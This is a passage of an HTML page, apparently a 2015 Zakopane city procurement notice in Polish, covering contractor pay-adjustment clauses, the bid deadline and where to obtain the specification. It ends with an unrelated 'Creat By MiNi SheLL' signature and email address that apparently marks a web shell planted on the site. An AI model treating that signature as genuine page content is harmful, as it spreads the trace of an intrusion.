3.W wypadku zmiany, o której mowa w ust. 2 pkt a) wartość netto wynagrodzenia Wykonawcy nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów.
4.W przypadku zmiany, o której mowa w ust 2 pkt b) wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy wynikającą ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących zamówienie do wysokości aktualnie obowiązującego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia.
5.W przypadku zmiany, o którym mowa w ust 2 pkt c) wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzecz Zamawiającego.
6.Za wyjątkiem sytuacji o której mowa w ust. 2 pkt a, wprowadzenie zmian wysokości wynagrodzenia wymaga złożenia przez Wykonawcę oprócz wniosku także dokumentów uzasadniających wnioskowaną wysokość dodatkowych koszów wynikających z wprowadzenia zmian, o których  mowa w ust 2 pkt b i c. Zamawiający w terminie 7 dni od daty ich otrzymania, zobowiązany jest do dokonania ich oceny pod kątem czy potwierdzają wnioskowaną zmianę wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne postępowania poniżej  wartości  art.11.8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Współpracy Europejskiej
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2015 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok.8 
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com